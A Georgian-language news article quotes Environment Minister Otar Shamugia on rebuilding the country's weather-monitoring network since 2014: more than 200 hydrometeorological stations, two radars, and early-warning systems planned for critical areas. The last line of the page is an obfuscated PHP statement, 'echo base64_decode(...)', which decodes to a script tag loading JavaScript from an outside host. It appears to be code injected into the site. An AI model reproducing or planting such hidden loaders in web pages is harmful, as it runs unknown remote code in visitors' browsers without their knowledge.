celsiusi
ავერსი შნაიდერი

გარემოს დაცვის მინისტრის ოთარ შამუგიას განცხადებით, 2014 წლამდე საქართველოს არ ჰქონდა მეტეოროლოგიური, ჰიდრომეტეოროლოგიური სადგურები და  აქტიურად დაიწყო ქვეყნის მასშტაბით მონიტორინგის ქსელის განვითარება, რომელიც სრულად მოშლილი იყო.

მინისტრის განმარტებით, ბოლო წლების განმავლობაში 200-ზე მეტი ჰიდრომეტეოროლოგიური სადგური დამონტაჟდა და ეს პროცესი ბოლომდე იქნება მიყვანილი. ამავდროულად, ოთარ შამუგია აღნიშნავს, რომ პირველ ეტაპზე ყველაზე კრიტიკულ ადგილებში მოხდება ადრეული გაფრთხილების სისტემების მონტაჟი.

„ძალიან აქტიურად დავიწყეთ ქვეყნის მასშტაბით, განსაკუთრებით ბოლო წლების განმავლობაში მონიტორინგის მთელი ქსელის განვითარება. 2014 წლიდან დაიწყო ეს პროცესი და ხაზი მინდა გავუსვა, აბსოლუტურად, სრულად მოშლილი იყო ქვეყანაში მონიტორინგის სისტემა, ჩვენ არ გვქონდა მეტეოროლოგიური, ჰიდრომეტეოროლოგიური სადგურები. 2014 წლიდან დავიწყეთ აქტიურად პროცესი და ბოლო წლების განმავლობაში, მათ შორის დონორების დახმარებით, ჩვენ ვახორციელებთ მეტეოროლოგიური, ჰიდრომეტეოროლოგიური სადგურების მონტაჟს, ორი ახალი, სრულიად თანამედროვე რადარი იქნა დამონტაჟებული დასავლეთ საქართველოში და აღმოსავლეთ საქართველოში, რომელიც გვაძლევს ინფორმაციას ამინდის შესახებ, რაც ასევე მნიშვნელოვანია.

200-ზე მეტი ჰიდრომეტეოროლოგიური სადგური იქნა ბოლო წლების განმავლობაში დამონტაჟებული და ეს პროცესი აქტიურად გრძელდება, რა თქმა უნდა, ამ პროცესებს მივიყვანთ ბოლომდე. რაც შეეხება ადრეული გაფრთხილების სისტემებს, არის ამის შემდგომ გადასადგმელი ნაბიჯი იმ შეფასებებთა ერთად, რომელიც უნდა გააკეთონ და აკეთებენ სპეციალისტები. ასევე, მზადდება და წელს დასრულდება რუკები, რომლებიც საფრთხის შემცველ ტერიტორიებზე მოგვცემენ უფრო დეტალურ ინფორმაციას. ეს პროცესი თანმიმდევრულია. ანუ, მონიტოროინგმა, არსებულმა დაკვირვებებმა ექსპერტებს უნდა მისცეს ანალიზის საშუალება, სად არის მიზანშეწონილი  შესაბამისი ადრეული გაფრთხილების სისტემების დაყენება. სადღაც ეს შეიძლება იყოს ეფექტური, სადღაც შეიძლება არ იყოს, დროის და მონაკვეთის სიმცირიდან გამომდინარე. ამიტომ  ეს პროცესი ჩვენმა ხელისუფლებამ დავიწყეთ ძალიან აქტიურად, გავაგრძელებთ და ძალიან მალე, ვფიქრობ, უკვე მთელი ქვეყანა სრულად იქნება დაფარული მონიტორინგის ქსელით, გვექნება სრული ინფორმაცია და უკვე ექსპერტების შეფასების შესაბამისად განხორციელდება პირველ ეტაპზე ყველაზე კრიტიკულ ადგილებში ადრეული გაფრთხილების სისტემების მონტაჟი“, – განაცხადა ოთარ შამუგიამ.


292
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");